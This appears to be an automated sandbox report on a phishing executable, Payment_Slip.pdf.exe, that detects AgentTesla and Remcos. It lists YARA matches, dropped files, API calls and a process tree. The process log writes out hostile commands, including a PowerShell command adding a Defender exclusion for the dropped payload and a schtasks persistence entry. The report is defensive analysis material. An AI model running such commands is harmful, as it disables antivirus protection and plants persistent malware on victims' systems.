Source: 0000000D.00000000.1218959335.0000000000D72000.00000002.00000001.01000000.0000000E.sdmp, type: MEMORY	Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
Source: 00000007.00000002.1251111243.000000000416F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 00000011.00000002.1224421328.0000000000456000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 00000000.00000002.1187261780.000000000340E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: Payment_Slip.pdf.exe PID: 8060, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: mHTmhPhJy.exe PID: 7856, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: mHTmhPhJy.exe PID: 5392, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: conserver.exe PID: 8164, type: MEMORYSTR	Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
Source: Process Memory Space: dwn.exe PID: 7300, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: C:\Users\user\AppData\Local\Temp\conserver.exe, type: DROPPED	Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
Source: C:\Users\user\AppData\Local\Temp\conserver.exe, type: DROPPED	Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe, type: DROPPED	Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe, type: DROPPED	Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: C:\Users\user\AppData\Local\Temp\dwn.exe, type: DROPPED	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: C:\Users\user\AppData\Local\Temp\dwn.exe, type: DROPPED	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: C:\Users\user\AppData\Local\Temp\dwn.exe, type: DROPPED	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe

Source: Payment_Slip.pdf.exe	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: mHTmhPhJy.exe.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: host.exe.5.dr, P.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: host.exe.5.dr, P.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: host.exe.5.dr, P.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: host.exe.5.dr, P.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: host.exe.5.dr, N.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: host.exe.5.dr, N.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: host.exe.5.dr, N.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: host.exe.5.dr, N.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: 0.2.Payment_Slip.pdf.exe.8250000.6.raw.unpack, B6t4opnIAo1QtrxVaa.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.Payment_Slip.pdf.exe.8250000.6.raw.unpack, B6t4opnIAo1QtrxVaa.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Payment_Slip.pdf.exe.8250000.6.raw.unpack, TkYyY8ejXRydhTtm3i.cs	Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 0.2.Payment_Slip.pdf.exe.8250000.6.raw.unpack, TkYyY8ejXRydhTtm3i.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Payment_Slip.pdf.exe.8250000.6.raw.unpack, TkYyY8ejXRydhTtm3i.cs	Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)

Source: classification engine

Classification label: mal100.rans.phis.troj.spyw.evad.winEXE@33/34@6/7

Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe

Code function: 14_2_004182CE GetLastError,FormatMessageW,FormatMessageA,LocalFree,free,

14_2_004182CE

Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe	Code function: 11_2_00415C90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,	11_2_00415C90
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Code function: 16_2_00410DE1 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueA,GetProcAddress,AdjustTokenPrivileges,CloseHandle,	16_2_00410DE1
Source: C:\Users\user\AppData\Local\Temp\dwn.exe	Code function: 17_2_00415C90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,	17_2_00415C90

Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe

Code function: 14_2_00418758 GetDiskFreeSpaceW,GetDiskFreeSpaceA,free,

14_2_00418758

Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe

Code function: 11_2_0040E2E7 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,Process32NextW,CloseHandle,

11_2_0040E2E7

Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe

Code function: 11_2_00419493 FindResourceA,LoadResource,LockResource,SizeofResource,

11_2_00419493

Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe

Code function: 11_2_00418A00 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,

11_2_00418A00

Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe

File created: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe

Jump to behavior

Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7276:120:WilError_03
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Mutant created: \Sessions\1\BaseNamedObjects\Rmc-TWFFFD
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5936:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8188:120:WilError_03
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe	Mutant created: \Sessions\1\BaseNamedObjects\dEEtDNIXGrGLJw

Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe

File created: C:\Users\user\AppData\Local\Temp\tmp2819.tmp

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\dwn.exe	Command line argument: Software\	17_2_0040D3F0
Source: C:\Users\user\AppData\Local\Temp\dwn.exe	Command line argument: 0"G	17_2_0040D3F0
Source: C:\Users\user\AppData\Local\Temp\dwn.exe	Command line argument: Exe	17_2_0040D3F0
Source: C:\Users\user\AppData\Local\Temp\dwn.exe	Command line argument: 0"G	17_2_0040D3F0
Source: C:\Users\user\AppData\Local\Temp\dwn.exe	Command line argument: (#G	17_2_0040D3F0
Source: C:\Users\user\AppData\Local\Temp\dwn.exe	Command line argument: Inj	17_2_0040D3F0
Source: C:\Users\user\AppData\Local\Temp\dwn.exe	Command line argument: Inj	17_2_0040D3F0
Source: C:\Users\user\AppData\Local\Temp\dwn.exe	Command line argument: Inj	17_2_0040D3F0
Source: C:\Users\user\AppData\Local\Temp\dwn.exe	Command line argument: 0"G	17_2_0040D3F0
Source: C:\Users\user\AppData\Local\Temp\dwn.exe	Command line argument: origmsc	17_2_0040D3F0
Source: C:\Users\user\AppData\Local\Temp\dwn.exe	Command line argument: !G	17_2_0040D3F0
Source: C:\Users\user\AppData\Local\Temp\dwn.exe	Command line argument: !G	17_2_0040D3F0
Source: C:\Users\user\AppData\Local\Temp\dwn.exe	Command line argument: !G	17_2_0040D3F0
Source: C:\Users\user\AppData\Local\Temp\dwn.exe	Command line argument: H"G	17_2_0040D3F0
Source: C:\Users\user\AppData\Local\Temp\dwn.exe	Command line argument: !G	17_2_0040D3F0
Source: C:\Users\user\AppData\Local\Temp\dwn.exe	Command line argument: exepath	17_2_0040D3F0
Source: C:\Users\user\AppData\Local\Temp\dwn.exe	Command line argument: H"G	17_2_0040D3F0
Source: C:\Users\user\AppData\Local\Temp\dwn.exe	Command line argument: exepath	17_2_0040D3F0
Source: C:\Users\user\AppData\Local\Temp\dwn.exe	Command line argument: !G	17_2_0040D3F0
Source: C:\Users\user\AppData\Local\Temp\dwn.exe	Command line argument: licence	17_2_0040D3F0
Source: C:\Users\user\AppData\Local\Temp\dwn.exe	Command line argument: `"G	17_2_0040D3F0
Source: C:\Users\user\AppData\Local\Temp\dwn.exe	Command line argument: Administrator	17_2_0040D3F0
Source: C:\Users\user\AppData\Local\Temp\dwn.exe	Command line argument: User	17_2_0040D3F0

Source: Payment_Slip.pdf.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: Payment_Slip.pdf.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%

Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe

System information queried: HandleInformation

Source: C:\Users\user\AppData\Roaming\host.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\host.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\host.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\host.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\host.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\host.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\host.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\conserver.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\conserver.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\conserver.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\conserver.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\conserver.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\conserver.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: Payment_Slip.pdf.exe, Payment_Slip.pdf.exe, 0000000E.00000002.1241566515.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Binary or memory string: SELECT 'INSERT INTO vacuum_db.' \|\| quote(name) \|\| ' SELECT * FROM main.' \|\| quote(name) \|\| ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: Payment_Slip.pdf.exe, Payment_Slip.pdf.exe, 0000000F.00000002.1222989805.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: Payment_Slip.pdf.exe, 0000000E.00000002.1241566515.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
Source: Payment_Slip.pdf.exe, Payment_Slip.pdf.exe, 0000000E.00000002.1241566515.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Binary or memory string: SELECT 'INSERT INTO vacuum_db.' \|\| quote(name) \|\| ' SELECT * FROM main.' \|\| quote(name) \|\| ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
Source: Payment_Slip.pdf.exe, Payment_Slip.pdf.exe, 0000000E.00000002.1241566515.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: Payment_Slip.pdf.exe, Payment_Slip.pdf.exe, 0000000E.00000002.1241566515.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: conserver.exe, 0000000D.00000002.3619471195.00000000030A9000.00000004.00000800.00020000.00000000.sdmp, Payment_Slip.pdf.exe, 0000000E.00000002.1244293689.0000000003098000.00000004.00000020.00020000.00000000.sdmp, Windows Update.exe, 00000018.00000002.1539307669.00000000032D9000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 0000001A.00000002.3620793390.0000000002AB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: Payment_Slip.pdf.exe, Payment_Slip.pdf.exe, 0000000E.00000002.1241566515.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Binary or memory string: SELECT 'DELETE FROM vacuum_db.' \|\| quote(name) \|\| ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'

Source: Payment_Slip.pdf.exe	Virustotal: Detection: 45%
Source: Payment_Slip.pdf.exe	ReversingLabs: Detection: 50%

Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe

File read: C:\Users\user\Desktop\Payment_Slip.pdf.exe

Jump to behavior

Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe

Evasive API call chain: __getmainargs,DecisionNodes,exit

Source: unknown	Process created: C:\Users\user\Desktop\Payment_Slip.pdf.exe "C:\Users\user\Desktop\Payment_Slip.pdf.exe"
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\mHTmhPhJy.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\mHTmhPhJy" /XML "C:\Users\user\AppData\Local\Temp\tmp2819.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Process created: C:\Users\user\Desktop\Payment_Slip.pdf.exe "C:\Users\user\Desktop\Payment_Slip.pdf.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: unknown	Process created: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe C:\Users\user\AppData\Roaming\mHTmhPhJy.exe
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\mHTmhPhJy" /XML "C:\Users\user\AppData\Local\Temp\tmp36FE.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe	Process created: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe "C:\Users\user\AppData\Roaming\mHTmhPhJy.exe"
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Process created: C:\Users\user\AppData\Roaming\host.exe "C:\Users\user\AppData\Roaming\host.exe"
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Process created: C:\Users\user\AppData\Local\Temp\conserver.exe "C:\Users\user\AppData\Local\Temp\conserver.exe"
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Process created: C:\Users\user\Desktop\Payment_Slip.pdf.exe C:\Users\user\Desktop\Payment_Slip.pdf.exe /stext "C:\Users\user\AppData\Local\Temp\qticobshgwcqiiv"
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Process created: C:\Users\user\Desktop\Payment_Slip.pdf.exe C:\Users\user\Desktop\Payment_Slip.pdf.exe /stext "C:\Users\user\AppData\Local\Temp\snnvpudbueuusojfxn"
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Process created: C:\Users\user\Desktop\Payment_Slip.pdf.exe C:\Users\user\Desktop\Payment_Slip.pdf.exe /stext "C:\Users\user\AppData\Local\Temp\dpanqmncqmmhvvfjoxmrs"
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Process created: C:\Users\user\AppData\Local\Temp\dwn.exe "C:\Users\user\AppData\Local\Temp\dwn.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe "C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe "C:\Users\user\AppData\Roaming\mykksg\mykksg.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe "C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe "C:\Users\user\AppData\Roaming\mykksg\mykksg.exe"
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\mHTmhPhJy.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\mHTmhPhJy" /XML "C:\Users\user\AppData\Local\Temp\tmp2819.tmp"	Jump to behavior
